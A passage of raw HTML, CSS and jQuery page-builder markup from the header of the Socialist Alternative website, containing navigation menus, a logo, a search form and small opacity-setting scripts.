.td_uid_18_5cdd903e330d8_rand{ width:20% !important; display:inline-block !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_mobile_search td_uid_19_5cdd903e33219_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_19_5cdd903e33219" > <style> /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .td_uid_19_5cdd903e33219_rand{ margin-right:-19px !important; margin-bottom:0px !important; } } </style> <style> /* custom css */ .td_uid_19_5cdd903e33219_rand { display: inline-block; } .td_uid_19_5cdd903e33219_rand { float: right; } .td_uid_19_5cdd903e33219_rand #tdb-header-search-button-mob i { font-size: 22px; } .td_uid_19_5cdd903e33219_rand #tdb-header-search-button-mob i { width: 55px; height: 55px; line-height: 55px; } .td_uid_19_5cdd903e33219_rand #tdb-header-search-button-mob { color: #ffffff; } </style><div class="tdb-block-inner td-fix-index"><a id="tdb-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="tdb-mobile-search-icon td-icon-search"></i></a></div></div> <!-- ./block --></div></div></div></div> <script> jQuery(window).load(function () { jQuery('body').find('#td_uid_9_5cdd903e2e525 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); </script> <script> jQuery(window).ready(function () { // We need timeout because the content must be rendered and interpreted on client setTimeout(function () { var $content = jQuery('body').find('#tdc-live-iframe'), refWindow = undefined; if ($content.length) { $content = $content.contents(); refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument; } else { $content = jQuery('body'); refWindow = window; } $content.find('#td_uid_9_5cdd903e2e525 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); }, 200); </script> </div></div> <script> jQuery(window).load(function () { jQuery('body').find('#td_uid_8_5cdd903e2e2c4 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); </script> <script> jQuery(window).ready(function () { // We need timeout because the content must be rendered and interpreted on client setTimeout(function () { var $content = jQuery('body').find('#tdc-live-iframe'), refWindow = undefined; if ($content.length) { $content = $content.contents(); refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument; } else { $content = jQuery('body'); refWindow = window; } $content.find('#td_uid_8_5cdd903e2e2c4 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); }, 200); </script> </div> <div class="td-header-desktop-wrap "> <div id="td_uid_13_5cdd903e335ea" class="tdc-zone"><div class="tdc_zone td_uid_20_5cdd903e335f1_rand wpb_row td-pb-row tdc-element-style" > <style scoped> /* custom css */ .td_uid_20_5cdd903e335f1_rand { min-height: 0; } .td-header-desktop-wrap { position: relative; } /* inline tdc_css att */ .td_uid_20_5cdd903e335f1_rand{ position:relative; } </style> <div class="td_uid_13_5cdd903e335ea_rand_style td-element-style" ><style> .td_uid_13_5cdd903e335ea_rand_style{ background-color:#ffffff !important; } </style></div><div id="td_uid_14_5cdd903e337b2" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row td_uid_21_5cdd903e337b8_rand wpb_row td-pb-row tdc-element-style tdc-row-content-vert-center" > <style scoped> /* custom css */ @media (min-width: 768px) { .td_uid_21_5cdd903e337b8_rand { margin-left: -0px; margin-right: -0px; } .td_uid_21_5cdd903e337b8_rand .vc_column { padding-left: 0px; padding-right: 0px; } } .td_uid_21_5cdd903e337b8_rand { min-height: 0; } #td_uid_14_5cdd903e337b2 { position: relative; } #td_uid_14_5cdd903e337b2:before { display: block; width: 100vw; height: 100%; position: absolute; left: 50%; transform: translateX(-50%); box-shadow: 0px 6px 8px 0px rgba(0, 0, 0, 0.08); z-index: 20; pointer-events: none; } .td_uid_21_5cdd903e337b8_rand.tdc-row-content-vert-center, .td_uid_21_5cdd903e337b8_rand.tdc-row-content-vert-center .tdc-columns { display: flex; align-items: center; flex: 1; } .td_uid_21_5cdd903e337b8_rand.tdc-row-content-vert-bottom, .td_uid_21_5cdd903e337b8_rand.tdc-row-content-vert-bottom .tdc-columns { display: flex; align-items: flex-end; flex: 1; } @media (max-width: 767px) { .td_uid_21_5cdd903e337b8_rand, .td_uid_21_5cdd903e337b8_rand .tdc-columns { flex-direction: column; } } .td_uid_21_5cdd903e337b8_rand.tdc-row-content-vert-center .td_block_wrap { vertical-align: middle; } .td_uid_21_5cdd903e337b8_rand.tdc-row-content-vert-bottom .td_block_wrap { vertical-align: bottom; } /* inline tdc_css att */ .td_uid_21_5cdd903e337b8_rand{ position:relative; } .td_uid_21_5cdd903e337b8_rand .td_block_wrap{ text-align:left } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .td_uid_21_5cdd903e337b8_rand{ padding-right:14px !important; padding-left:14px !important; } } </style> <div class="td_uid_14_5cdd903e337b2_rand_style td-element-style" style="opacity: 0; transition: opacity 1s;"><style> .td_uid_14_5cdd903e337b2_rand_style{ background-color:#cc1e12 !important; } </style></div><div class="vc_column td_uid_22_5cdd903e339e4_rand wpb_column vc_column_container tdc-column td-pb-span3"> <style scoped> /* custom css */ .td_uid_22_5cdd903e339e4_rand { vertical-align: baseline; } /* inline tdc_css att */ .td_uid_22_5cdd903e339e4_rand{ width:18% !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .td_uid_22_5cdd903e339e4_rand{ width:20% !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_logo td_uid_23_5cdd903e33af4_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_23_5cdd903e33af4" > <style> /* custom css */ .td_uid_23_5cdd903e33af4_rand .tdb-logo-a, .td_uid_23_5cdd903e33af4_rand h1 { flex-direction: row; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-a, .td_uid_23_5cdd903e33af4_rand h1 { align-items: flex-end; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-img { max-width: 160px; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-img-wrap { margin-right: 5px; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-img-wrap:last-child { margin-right: 0; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-img-wrap { margin-bottom: 0px; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-img-wrap:last-child { margin-bottom: 0; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-img-wrap { display: block; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-tagline { margin-top: -2px; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-title { display: none; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-tagline { display: block; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-title, .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-tagline { display: block; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-tagline { text-align: center; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-icon { top: 0px; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-icon { display: none; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-title { color: #ffffff; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-tagline { color: #ffffff; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-title { font-family:Oswald !important;font-size:25px !important;text-transform:uppercase !important;; } .td_uid_23_5cdd903e33af4_rand .tdb-logo-text-tagline { font-family:Open Sans !important;font-size:16px !important;; } </style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://www.socialistalternative.org/"><div class="tdb-logo-img-wrap"><img class="tdb-logo-img td-retina-data" data-retina="https://www.socialistalternative.org/wp-content/uploads/2019/03/logo-transparent.png" src="https://www.socialistalternative.org/wp-content/uploads/2019/02/whitelogo-1.png" alt="" title="" width="1387px" /></div></a></div></div> <!-- ./block --></div></div><div class="vc_column td_uid_24_5cdd903e3bc5e_rand wpb_column vc_column_container tdc-column td-pb-span9"> <style scoped> /* custom css */ .td_uid_24_5cdd903e3bc5e_rand { vertical-align: baseline; } /* inline tdc_css att */ .td_uid_24_5cdd903e3bc5e_rand{ padding-right:30px !important; padding-left:30px !important; width:95% !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .td_uid_24_5cdd903e3bc5e_rand{ padding-right:20px !important; padding-left:20px !important; width:100% !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_menu td_uid_25_5cdd903e3c3c3_rand tds_menu_active1 tds_menu_sub_active1 tdb-head-menu-inline tdb-menu-items-in-more tdb-mm-align-screen td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_25_5cdd903e3c3c3" style=" z-index: 999;"> <style> /* custom css */ .td_uid_25_5cdd903e3c3c3_rand { display: inline-block; } .td_uid_25_5cdd903e3c3c3_rand .td_block_inner { text-align: center; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li { margin-right: 28px; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li:last-child { margin-right: 0; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu-items-dropdown { margin-left: 28px; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu-items-empty + .tdb-menu-items-dropdown { margin-left: 0; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li > a, .td_uid_25_5cdd903e3c3c3_rand .td-subcat-more { padding: 0px; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li .tdb-menu-sep, .td_uid_25_5cdd903e3c3c3_rand .tdb-menu-items-dropdown .tdb-menu-sep { top: -1px; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li > a .tdb-sub-menu-icon, .td_uid_25_5cdd903e3c3c3_rand .td-subcat-more .tdb-menu-more-subicon { top: -1px; } .td_uid_25_5cdd903e3c3c3_rand .td-subcat-more .tdb-menu-more-icon { top: 0px; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li > a, .td_uid_25_5cdd903e3c3c3_rand .td-subcat-more > .tdb-menu-item-text { color: #ffffff; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li > a, .td_uid_25_5cdd903e3c3c3_rand .td-subcat-more > .tdb-menu-item-text { font-family:Roboto Condensed !important;font-size:16px !important;line-height:70px !important;font-weight:700 !important; } .td_uid_25_5cdd903e3c3c3_rand .tdb-normal-menu ul.sub-menu, .td_uid_25_5cdd903e3c3c3_rand .td-pulldown-filter-list { width: 140px !important; } .td_uid_25_5cdd903e3c3c3_rand .tdb-normal-menu > ul, .td_uid_25_5cdd903e3c3c3_rand .td-pulldown-filter-list { left: -29px; } @media (max-width: 1018px) { .td_uid_25_5cdd903e3c3c3_rand .td-pulldown-filter-list { left: auto; right: -29px; } } .td_uid_25_5cdd903e3c3c3_rand .tdb-normal-menu ul .tdb-menu-item > a .tdb-sub-menu-icon { right: 0; } .td_uid_25_5cdd903e3c3c3_rand .tdb-normal-menu ul .tdb-menu-item > a .tdb-sub-menu-icon { margin-top: 1px; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu .tdb-normal-menu ul, .td_uid_25_5cdd903e3c3c3_rand .td-pulldown-filter-list { box-shadow: 1px 1px 4px 0px rgba(0, 0, 0, 0.15); } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu .tdb-normal-menu ul .tdb-menu-item > a, .td_uid_25_5cdd903e3c3c3_rand .td-pulldown-filter-list li a { font-family:Roboto Condensed !important;font-size:14px !important;font-weight:700 !important;text-transform:uppercase !important; } .td_uid_25_5cdd903e3c3c3_rand:not(.tdb-mm-align-screen) .tdb-mega-menu ul, .td_uid_25_5cdd903e3c3c3_rand .tdb-mega-menu ul li { max-width: 1200px !important; } .td_uid_25_5cdd903e3c3c3_rand .tdb-mega-menu .tdb_header_mega_menu { max-width: 1114px; margin: 0 auto; } .td_uid_25_5cdd903e3c3c3_rand .tdb-mega-menu .tdb_header_mega_menu { margin-right: 0; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu .tdb-mega-menu ul li { box-shadow: 0px 2px 6px 0px rgba(0, 0, 0, 0.1); } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li { margin-right: 18px; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li:last-child { margin-right: 0; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu-items-dropdown { margin-left: 18px; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu-items-empty + .tdb-menu-items-dropdown { margin-left: 0; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li > a, .td_uid_25_5cdd903e3c3c3_rand .td-subcat-more > .tdb-menu-item-text { font-family:Roboto Condensed !important;font-size:14px !important;line-height:60px !important;font-weight:700 !important; } } </style> <style> .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li > a:after, .td_uid_25_5cdd903e3c3c3_rand .tdb-menu-items-dropdown .td-subcat-more:after { background-color: rgba(255,255,255,0.7); } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu > li > a:after, .td_uid_25_5cdd903e3c3c3_rand .tdb-menu-items-dropdown .td-subcat-more:after { bottom: 0px; } </style> <style> .td_uid_25_5cdd903e3c3c3_rand .tdb-menu ul .tdb-normal-menu.current-menu-item > a, .td_uid_25_5cdd903e3c3c3_rand .tdb-menu ul .tdb-normal-menu:hover > a, .td_uid_25_5cdd903e3c3c3_rand .td-pulldown-filter-list li:hover a { color: #ffffff; } .td_uid_25_5cdd903e3c3c3_rand .tdb-menu ul .tdb-normal-menu.current-menu-item > a, .td_uid_25_5cdd903e3c3c3_rand .tdb-menu ul .tdb-normal-menu:hover > a, .td_uid_25_5cdd903e3c3c3_rand .td-pulldown-filter-list li:hover a { background-color: #ea2e2e; } </style><div id=td_uid_25_5cdd903e3c3c3 class="td_block_inner td-fix-index"><div class="tdb-menu-items-pulldown"><ul id="tdb-block-menu" class="tdb-menu tdb-menu-items-visible"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-first tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-21298"><a href="https://www.socialistalternative.org/join/"><span class="tdb-menu-item-text">Join SA</span><i class="tdb-sub-menu-icon td-icon-down"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item tdb-normal-menu menu-item-40483"><a href="https://www.socialistalternative.org/about/"><span class="tdb-menu-item-text">About/What We Stand For</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item tdb-normal-menu menu-item-42085"><a href="http://www.socialistalternative.org/socialistmerch/"><span class="tdb-menu-item-text">Socialist Merch</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-8416"><a href="https://www.socialistalternative.org/in-your-area/"><span class="tdb-menu-item-text">In Your Area</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-25613"><a href="http://www.socialistalternative.org/category/top-stories/"><span class="tdb-menu-item-text">News and Analysis</span><i class="tdb-sub-menu-icon td-icon-down"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-25629"><a href="https://www.socialistalternative.org/category/us-politics/"><span class="tdb-menu-item-text">U.S. Politics</span><i class="tdb-sub-menu-icon td-icon-right-arrow"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25620"><a href="https://www.socialistalternative.org/category/fighting-racism/"><span class="tdb-menu-item-text">Fighting Racism</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25621"><a href="https://www.socialistalternative.org/category/healthcare/"><span class="tdb-menu-item-text">Health Care</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25623"><a href="https://www.socialistalternative.org/category/immigrants-rights/"><span class="tdb-menu-item-text">Immigrants Rights</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25624"><a href="https://www.socialistalternative.org/category/lgbt-rights/"><span class="tdb-menu-item-text">LGBTQ Rights</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25633"><a href="https://www.socialistalternative.org/category/womens-rights/"><span class="tdb-menu-item-text">Women&#8217;s Rights</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25634"><a href="https://www.socialistalternative.org/category/workers-movement/"><span class="tdb-menu-item-text">Workers&#8217; Movement</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25615"><a href="https://www.socialistalternative.org/category/culture/"><span class="tdb-menu-item-text">Culture</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25616"><a href="https://www.socialistalternative.org/category/economy/"><span class="tdb-menu-item-text">Economy</span></a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25635"><a href="https://www.socialistalternative.org/category/world-events/"><span class="tdb-menu-item-text">World Events</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25636"><a href="https://www.socialistalternative.org/category/youth-students/"><span class="tdb-menu-item-text">Youth &amp; Students</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25618"><a href="https://www.socialistalternative.org/category/environment/"><span class="tdb-menu-item-text">Environment</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-25626"><a href="https://www.socialistalternative.org/category/socialist-alternative-in-action/"><span class="tdb-menu-item-text">Socialist Alternative In Action</span><i class="tdb-sub-menu-icon td-icon-right-arrow"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-27839"><a href="https://www.socialistalternative.org/category/socialist-alternative-in-action/documents-leaflets-statements/"><span class="tdb-menu-item-text">Documents &amp; Leaflets &amp; Statements</span></a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25631"><a href="https://www.socialistalternative.org/category/videos/"><span class="tdb-menu-item-text">Videos</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-25622"><a href="https://www.socialistalternative.org/category/history/"><span class="tdb-menu-item-text">History</span><i class="tdb-sub-menu-icon td-icon-right-arrow"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-27837"><a href="https://www.socialistalternative.org/category/history/centenary-of-russian-revolution/"><span class="tdb-menu-item-text">Centenary of the Russian Revolution</span></a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-25627"><a href="https://www.socialistalternative.org/category/theory/"><span class="tdb-menu-item-text">Theory</span></a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-8465"><a href="http://www.socialistworld.net"><span class="tdb-menu-item-text">World News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-13889"><a href="https://www.socialistalternative.org/publications/"><span class="tdb-menu-item-text">Publications</span><i class="tdb-sub-menu-icon td-icon-down"></i></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item tdb-normal-menu menu-item-24518"><a href="https://www.socialistalternative.org/publications/"><span class="tdb-menu-item-text">Books and Pamphlets</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item tdb-normal-menu menu-item-24519"><a href="https://www.socialistalternative.org/dual-subscription-deal/"><span class="tdb-menu-item-text">Newspaper</span></a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-21308"><a href="https://www.socialistalternative.org/category/en-espanol/"><span class="tdb-menu-item-text">en español</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-25670"><a href="/donate"><span class="tdb-menu-item-text">Donate</span></a></li> </ul><div class="tdb-menu-items-dropdown"><div class="td-subcat-more"><span class="tdb-menu-item-text">More</span><i class="tdb-menu-more-subicon td-icon-down"></i><ul class="td-pulldown-filter-list"></ul></div></div></div></div></div><div class="td_block_wrap tdb_header_search td_uid_28_5cdd903e42ab6_rand td-pb-border-top td_block_template_14 tdb-header-align" data-td-block-uid="td_uid_28_5cdd903e42ab6" > <style> /* inline tdc_css att */ .td_uid_28_5cdd903e42ab6_rand{ margin-top:10px !important; margin-right:0px !important; justify-content:flex-end !important; text-align:right !important; } /* desktop */ @media(min-width: 1141px) { .td_uid_28_5cdd903e42ab6_rand { display:inline-block !important; } } </style> <style> /* custom css */ .td_uid_28_5cdd903e42ab6_rand .tdb-head-search-btn i { font-size: 20px; } .td_uid_28_5cdd903e42ab6_rand .tdb-head-search-btn i { width: 48px; height: 48px; line-height: 48px; } .td_uid_28_5cdd903e42ab6_rand .tdb-head-search-btn { justify-content: flex-end; } .td_uid_28_5cdd903e42ab6_rand { float: right; } .td_uid_28_5cdd903e42ab6_rand .tdb-search-txt { top: 0px; } .td_uid_28_5cdd903e42ab6_rand .tdb-drop-down-search { left: auto; right: 0; } .td_uid_28_5cdd903e42ab6_rand .tdb-head-search-form-input:focus + .tdb-head-search-placeholder { top: -50%; transform: translateY(0); } .td_uid_28_5cdd903e42ab6_rand .tdb-head-search-form-btn i { top: 0px; } .td_uid_28_5cdd903e42ab6_rand .result-msg { text-align: center; } .td_uid_28_5cdd903e42ab6_rand .tdb-head-search-btn i { color: #ffffff; } .td_uid_28_5cdd903e42ab6_rand .tdb-head-search-btn:hover i { color: #ffffff; } .td_uid_28_5cdd903e42ab6_rand .tdb-drop-down-search { box-shadow: 0px 2px 6px 0px rgba(0, 0, 0, 0.2); } .td_uid_28_5cdd903e42ab6_rand .tdb-head-search-form-input:focus + .tdb-head-search-placeholder { opacity: 0.5; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap { width: 100%; float: left; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap:nth-last-child(-n+1) { margin-bottom: 0; padding-bottom: 0; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap:nth-last-child(-n+1) .td-module-container:before { display: none; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap { padding-left: 11px; padding-right: 11px; } .td_uid_28_5cdd903e42ab6_rand .tdb-aj-search-inner { margin-left: -11px; margin-right: -11px; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap { padding-bottom: 10px; margin-bottom: 10px; } .td_uid_28_5cdd903e42ab6_rand .td-module-container:before { bottom: -10px; } .td_uid_28_5cdd903e42ab6_rand .td-module-container:before { border-color: #eaeaea; } .td_uid_28_5cdd903e42ab6_rand .entry-thumb { background-position: center 50%; } .td_uid_28_5cdd903e42ab6_rand .td-image-container { flex: 0 0 30%; width: 30%; } .ie10 .td_uid_28_5cdd903e42ab6_rand .td-image-container, .ie11 .td_uid_28_5cdd903e42ab6_rand .td-image-container { flex: 0 0 auto; } .td_uid_28_5cdd903e42ab6_rand .td-module-container { flex-direction: row; } .td_uid_28_5cdd903e42ab6_rand .td-image-container { display: block; order: 0; } .ie10 .td_uid_28_5cdd903e42ab6_rand .td-module-meta-info, .ie11 .td_uid_28_5cdd903e42ab6_rand .td-module-meta-info { flex: 1; } .td_uid_28_5cdd903e42ab6_rand .td-module-meta-info { padding: 2px 0 0 15px; } .td_uid_28_5cdd903e42ab6_rand .entry-title { margin: 0 0 5px; } .td_uid_28_5cdd903e42ab6_rand .td-excerpt { column-count: 1; } .td_uid_28_5cdd903e42ab6_rand .td-excerpt { column-gap: 48px; } .td_uid_28_5cdd903e42ab6_rand .td-module-meta-info { border-color: #eaeaea; } .td_uid_28_5cdd903e42ab6_rand .td-post-category { display: none; } .td_uid_28_5cdd903e42ab6_rand .td-excerpt { display: none; } .td_uid_28_5cdd903e42ab6_rand .td-read-more { display: none; } .td_uid_28_5cdd903e42ab6_rand .td-post-author-name { display: none; } .td_uid_28_5cdd903e42ab6_rand .entry-review-stars { display: none; } .td_uid_28_5cdd903e42ab6_rand .td-module-comments { display: none; } .td_uid_28_5cdd903e42ab6_rand .tdb-author-photo .avatar { width: 20px; height: 20px; } .td_uid_28_5cdd903e42ab6_rand .tdb-author-photo .avatar { margin-right: 6px; } .td_uid_28_5cdd903e42ab6_rand .tdb-author-photo .avatar { border-radius: 50%; } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px){ .td_uid_28_5cdd903e42ab6_rand .td_module_wrap { padding-bottom: 10px !important; margin-bottom: 10px !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap:nth-last-child(-n+1) { margin-bottom: 0 !important; padding-bottom: 0 !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap .td-module-container:before { display: block !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap:nth-last-child(-n+1) .td-module-container:before { display: none !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap { padding-bottom: 10px; margin-bottom: 10px; } .td_uid_28_5cdd903e42ab6_rand .td-module-container:before { bottom: -10px; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .td_uid_28_5cdd903e42ab6_rand .td_module_wrap { padding-bottom: 10px !important; margin-bottom: 10px !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap:nth-last-child(-n+1) { margin-bottom: 0 !important; padding-bottom: 0 !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap .td-module-container:before { display: block !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap:nth-last-child(-n+1) .td-module-container:before { display: none !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap { padding-bottom: 10px; margin-bottom: 10px; } .td_uid_28_5cdd903e42ab6_rand .td-module-container:before { bottom: -10px; } } /* phone */ @media (max-width: 767px){ .td_uid_28_5cdd903e42ab6_rand .td_module_wrap { padding-bottom: 10px !important; margin-bottom: 10px !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap:nth-last-child(-n+1) { margin-bottom: 0 !important; padding-bottom: 0 !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap .td-module-container:before { display: block !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap:nth-last-child(-n+1) .td-module-container:before { display: none !important; } .td_uid_28_5cdd903e42ab6_rand .td_module_wrap { padding-bottom: 10px; margin-bottom: 10px; } .td_uid_28_5cdd903e42ab6_rand .td-module-container:before { bottom: -10px; } } </style><div class="tdb-block-inner td-fix-index"><div class="tdb-drop-down-search" aria-labelledby="td-header-search-button"><form method="get" class="tdb-search-form" action="https://www.socialistalternative.org/" aria-labelledby="tdb-head-search-form-btn"><div class="tdb-search-form-inner"><input class="tdb-head-search-form-input" type="text" value="" name="s" autocomplete="off" /><button class="wpb_button wpb_btn-inverse btn tdb-head-search-form-btn" type="submit"><span>Search</span></button></div></form><div class="tdb-aj-search"></div></div><a href="#" role="button" class="tdb-head-search-btn dropdown-toggle" data-toggle="dropdown"><i class="tdb-search-icon td-icon-search"></i></a></div></div> <!-- ./block --></div></div></div></div> <script> jQuery(window).load(function () { jQuery('body').find('#td_uid_14_5cdd903e337b2 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); </script> <script> jQuery(window).ready(function () { // We need timeout because the content must be rendered and interpreted on client setTimeout(function () { var $content = jQuery('body').find('#tdc-live-iframe'), refWindow = undefined; if ($content.length) { $content = $content.contents(); refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument; } else { $content = jQuery('body'); refWindow = window; } $content.find('#td_uid_14_5cdd903e337b2 .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); }, 200); </script> </div></div> <script> jQuery(window).load(function () { jQuery('body').find('#td_uid_13_5cdd903e335ea .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); </script> <script> jQuery(window).ready(function () { // We need timeout because the content must be rendered and interpreted on client setTimeout(function () { var $content = jQuery('body').find('#tdc-live-iframe'), refWindow = undefined; if ($content.length) { $content = $content.contents(); refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument; } else { $content = jQuery('body'); refWindow = window; } $content.find('#td_uid_13_5cdd903e335ea .td-element-style').each(function (index, element) { jQuery(element).css('opacity', 1); return; }); }); }, 200); </script> </div> <div class="td-header-desktop-sticky-wrap tdc-zone-sticky-invisible tdc-zone-sticky-inactive" style="display: none"> <div id="td_uid_17_5cdd903e45846" class="tdc-zone"><div class="tdc_zone td_uid_29_5cdd903e45850_rand wpb_row td-pb-row tdc-element-style" data-sticky-offset="0" > <style scoped> /* custom css */ .td_uid_29_5cdd903e45850_rand { min-height: 0; } #td_uid_17_5cdd903e45846 { position: relative; } #td_uid_17_5cdd903e45846:before { content: ''; display: block; width: 100vw; height: 100%; position: absolute; left: 50%; transform: translateX(-50%); box-shadow: 0px 6px 8px 0px rgba(0, 0, 0, 0.08); z-index: 20; pointer-events: none; } @media (max-width: 767px) { #td_uid_17_5cdd903e45846:before { width: 100%; } } 